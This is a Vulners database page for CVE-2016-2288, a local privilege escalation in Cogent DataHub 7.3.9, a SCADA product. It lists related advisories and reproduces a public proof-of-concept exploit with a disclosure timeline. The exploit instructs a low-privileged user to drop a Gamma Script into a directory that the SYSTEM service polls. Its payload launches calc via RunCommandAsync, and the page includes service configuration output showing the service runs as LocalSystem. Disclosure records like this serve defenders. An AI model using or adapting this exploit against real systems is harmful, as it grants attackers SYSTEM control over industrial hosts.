Vulners
Lucene search
Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege | 28 Mar 201600:00 | – | zdt |
 | CVE-2016-2288 | 28 Mar 201600:00 | – | circl |
 | Cogent Real-Time Systems Cogent DataHub Privilege Vulnerability | 25 Mar 201600:00 | – | cnvd |
 | CVE-2016-2288 | 29 Mar 201615:00 | – | cve |
 | CVE-2016-2288 | 29 Mar 201615:00 | – | cvelist |
 | EUVD-2016-3372 | 7 Oct 202500:30 | – | euvd |
 | Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation | 28 Mar 201600:00 | – | exploitpack |
 | Cogent DataHub Elevation of Privilege Vulnerability | 26 Dec 201607:00 | – | ics |
 | KLA10779 Privilege escalation vulnerability at Cogent DataHub | 31 Mar 201600:00 | – | kaspersky |
 | CVE-2016-2288 | 29 Mar 201615:59 | – | nvd |
10
/*
# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE‑2016-2288
sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe
Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01
Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released
Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script
Exploitation:
=============
As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow
a write into c:\ as guest, but we are in the SCADA world. Anything is possible.
C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Cogent DataHub
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cogent DataHub
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\Users\steven>
*/
require ("Application");
require ("AsyncRun"); // thanks to our friends @ Cogent
class WebstreamSupport Application
{
}
method WebstreamSupport.constructor ()
{
RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}
Webstream = ApplicationSingleton (WebstreamSupport);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2016 00:00Current
7High risk
Vulners AI Score7
CVSS 27.2
CVSS 37.8
EPSS0.00312